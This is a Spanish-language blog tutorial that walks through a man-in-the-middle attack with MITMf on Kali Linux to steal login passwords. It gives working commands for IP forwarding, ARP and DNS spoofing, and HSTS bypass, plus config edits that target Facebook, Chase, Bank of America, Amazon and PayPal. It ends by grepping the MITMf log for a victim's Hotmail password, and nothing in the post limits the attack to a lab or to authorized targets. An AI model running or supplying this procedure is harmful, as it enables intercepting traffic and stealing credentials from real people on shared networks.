Advertisement

header ads

HACER ATAQUES Man-in-the-middle (Sniffing Passwords)EN KALI LINUX

Continuamos nuestra pequeña serie de Man-in-the-middle en el cual KALI LINUX te va ayudar.


Quiero que empieces a leer algunos post que he publicado anteriormente:

Como he explicado en algunos post sobre MITMF creo que vamos a intentar de configurar para hacer el ataque.
Obviamente MITMF tiene una opción para modificar y mejorar tus ataques.

PROCEDIMIENTO:

Configuramos los DNS de google
echo 1 > /proc/sys/net/ipv4/ip_forward
nano /etc/resolv.conf
# Generated by NetworkManager
nameserver 192.168.1.1
nameserver 8.8.8.8 
nameserver 8.8.4.4 
Ahora para saber si algún HSTS se puede funcionar este ataque.
curl -i -k https://www.hotmail.com |grep Location
curl -i -k https://www.paypal.com |grep Location
curl -i -k https://www.amazon.com/ |grep Location
curl -i -k https://twitter.com/ |grep Location
curl -i -k https://www.google.com.com/ |grep Location
curl -i -k https://www.facebook.com |grep Location
Ahora editar MITMF.CONF para colocar algunas paginas.
nano /usr/share/mitmf/config/mitmf.conf
Buscamos con CONTROL + W = SSL
        #for facebook
        www.facebook.com = secure.facebook.com

        #for chase Banking
        www.chase.com = secure.chase.com
        chaseonline.chase.com = secure.chase.com

        www.bankofamerica.com = secure.bankofamerica.com

        www.amazon.com = secure.amazon.com

        www.paypal.com = secure.paypal.com
Con eso podemos capturar una contraseña ordenando a mitmf

mitmf --spoof --arp --dns --hsts --gateway 192.168.1.1  -i wlan0
Estamos cargando el plugin de spoof, tambien que vamos a Redireccionar el trafico usando ARP spoofing, usamos DNS para algún proxy, tambien hsts para las SSL ahí ordenamos lo que modificamos ahí arriba, tambien gateway es la ip de tu ROUTER como 192.168.1.1 y al final es el interfaz puede ser eth0 o wlan0 o wlan1 según tu interfaz.
  Ahora la víctima ingresar a “HOTMAIL.COM”
  Y capturamos la contraseña.
 En caso de encontrar las contraseñas rápidamente puedes usar el siguiente comando:
tail -f /var/log/mitmf/mitmf.log | grep -i pass
Obviamente lo vas hacer mientras MITMF esta corriendo
 LISTO! Ahora si a jugar un rato! Te gusto? No te olvides en compartir y seguir la serie de MITMF.
GRACIAS!!



Publicar un comentario

0 Comentarios